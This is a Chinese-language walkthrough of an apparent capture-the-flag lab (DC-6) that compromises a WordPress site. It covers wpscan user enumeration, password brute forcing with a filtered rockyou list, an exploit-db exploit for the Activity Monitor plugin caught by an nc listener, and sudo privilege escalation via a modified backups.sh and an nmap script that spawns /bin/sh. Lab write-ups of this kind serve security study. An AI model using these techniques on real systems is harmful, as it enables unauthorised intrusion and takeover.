没有域名解析修改本地域名解析文件
发现使用的是WordPress
WordPress的漏洞扫描器
sudo apt-get install wpscan -y Reading package lists... Done Building dependency tree Reading state information... Done The following packages were automatically installed and are no longer required: ettercap-common ettercap-graphical figlet finger libapache2-mod-php libluajit-5.1-2 libluajit-5.1-common libnet-snmp-perl libnumber-bytes-human-perl libsybdb5 medusa nginx python3-aiohttp python3-aioredis python3-apscheduler python3-async-timeout python3-git python3-gitdb python3-hiredis python3-multidict python3-pefile python3-pyexploitdb python3-pyfiglet python3-pymssql python3-pyshodan python3-qrcode python3-quamash python3-redis python3-smmap python3-tld python3-yarl python3-yaswfp ruby-did-you-mean ruby2.5-doc rwho rwhod toilet-fonts wapiti Use 'sudo apt autoremove' to remove them. The following additional packages will be installed: ruby-cms-scanner ruby-ethon ruby-get-process-mem ruby-nokogiri ruby-opt-parse-validator ruby-pkg-config ruby-typhoeus ruby-yajl The following NEW packages will be installed: ruby-cms-scanner ruby-ethon ruby-get-process-mem ruby-nokogiri ruby-opt-parse-validator ruby-pkg-config ruby-typhoeus ruby-yajl wpscan 0 upgraded, 9 newly installed, 0 to remove and 1376 not upgraded. Need to get 350 kB of archives. After this operation, 1,676 kB of additional disk space will be used. Get:1 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-get-process-mem all 0.2.5-1 [6,432 B] Get:2 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-pkg-config all 1.4.4-1 [9,276 B] Get:3 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-nokogiri amd64 1.10.9+dfsg-1 [116 kB] Get:4 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-opt-parse-validator all 1.9.2-0kali1 [12.9 kB] Get:5 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-ethon all 0.9.0-2 [33.6 kB] Get:6 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-typhoeus all 1.4.0-1 [36.2 kB] Get:7 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-yajl amd64 1.3.1-2 [43.1 kB] Get:8 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-cms-scanner all 0.12.1-0kali1 [33.7 kB] Get:9 http://mirrors.neusoft.edu.cn/kali kali-rolling/non-free amd64 wpscan all 3.8.7-0kali1 [58.9 kB] Fetched 350 kB in 5s (75.6 kB/s) Selecting previously unselected package ruby-get-process-mem. (Reading database ... 310860 files and directories currently installed.) Preparing to unpack .../0-ruby-get-process-mem_0.2.5-1_all.deb ... Unpacking ruby-get-process-mem (0.2.5-1) ... Selecting previously unselected package ruby-pkg-config. Preparing to unpack .../1-ruby-pkg-config_1.4.4-1_all.deb ... Unpacking ruby-pkg-config (1.4.4-1) ... Selecting previously unselected package ruby-nokogiri. Preparing to unpack .../2-ruby-nokogiri_1.10.9+dfsg-1_amd64.deb ... Unpacking ruby-nokogiri (1.10.9+dfsg-1) ... Selecting previously unselected package ruby-opt-parse-validator. Preparing to unpack .../3-ruby-opt-parse-validator_1.9.2-0kali1_all.deb ... Unpacking ruby-opt-parse-validator (1.9.2-0kali1) ... Selecting previously unselected package ruby-ethon. Preparing to unpack .../4-ruby-ethon_0.9.0-2_all.deb ... Unpacking ruby-ethon (0.9.0-2) ... Selecting previously unselected package ruby-typhoeus. Preparing to unpack .../5-ruby-typhoeus_1.4.0-1_all.deb ... Unpacking ruby-typhoeus (1.4.0-1) ... Selecting previously unselected package ruby-yajl. Preparing to unpack .../6-ruby-yajl_1.3.1-2_amd64.deb ... Unpacking ruby-yajl (1.3.1-2) ... Selecting previously unselected package ruby-cms-scanner. Preparing to unpack .../7-ruby-cms-scanner_0.12.1-0kali1_all.deb ... Unpacking ruby-cms-scanner (0.12.1-0kali1) ... Selecting previously unselected package wpscan. Preparing to unpack .../8-wpscan_3.8.7-0kali1_all.deb ... Unpacking wpscan (3.8.7-0kali1) ... Setting up ruby-opt-parse-validator (1.9.2-0kali1) ... Setting up ruby-get-process-mem (0.2.5-1) ... Setting up ruby-pkg-config (1.4.4-1) ... Setting up ruby-ethon (0.9.0-2) ... Setting up ruby-yajl (1.3.1-2) ... Setting up ruby-nokogiri (1.10.9+dfsg-1) ... Setting up ruby-typhoeus (1.4.0-1) ... Setting up ruby-cms-scanner (0.12.1-0kali1) ... Setting up wpscan (3.8.7-0kali1) ... Processing triggers for man-db (2.9.0-2) ... Processing triggers for kali-menu (2020.1.7) ...扫描站点的所有用户
wpscan --url http://wordy/ --enumerate u
kali@ToolsScannerKali20201:~$ wpscan --url http://wordy/ --enumerate u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.7 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://wordy/ [192.168.43.182] [+] Started: Sun Oct 4 22:54:53 2020 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.25 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] WordPress readme found: http://wordy/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13). | Found By: Rss Generator (Passive Detection) | - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator> | - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator> [+] WordPress theme in use: twentyseventeen | Location: http://wordy/wp-content/themes/twentyseventeen/ | Last Updated: 2020-08-11T00:00:00.000Z | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.4 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 2.1 (80% confidence) | Found By: Style (Passive Detection) | - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] jens | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] graham | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] mark | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] sarah | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Sun Oct 4 22:54:55 2020 [+] Requests Done: 17 [+] Cached Requests: 49 [+] Data Sent: 3.98 KB [+] Data Received: 23.788 KB [+] Memory used: 177.148 MB [+] Elapsed time: 00:00:01jens graham mark serah
拷贝密码字典
cp /usr/share/wordlists/rock.txt ~/Desktop/设置用户字典
vim dc6user.txt根据提示过滤字典内容
cat rockyou.txt | grep k01 > dcppassword.txt密码爆破
得到账密 mark helpdesk01
登陆wordy后台
http://wordy/wp-admin/
发现activity monitor插件
wordprass一般都是插件问题
搜索已知activity monitor插件漏洞
searchsploit activity monitor cp /usr/share/exploitdb/exploits/php/webapps/45274.html修改html文件中部分内容
kali nc监听1234端口
nc -lvvp 1234sudo权限执行命令切换到普通用户或非管理员用户是不用输入密码的。
echo /bin/bash >> backups.sh cat backups.sh sudo -u jens ./backups.shjens 用户实行sudo -l 发现可以执行nmap
可编写特殊脚本nmap代用/bin/sh 执行提权操作
echo 'os.execute("/bin/sh")' > getshell sudo nmap --script=getshell cd /root cat theflag.txt
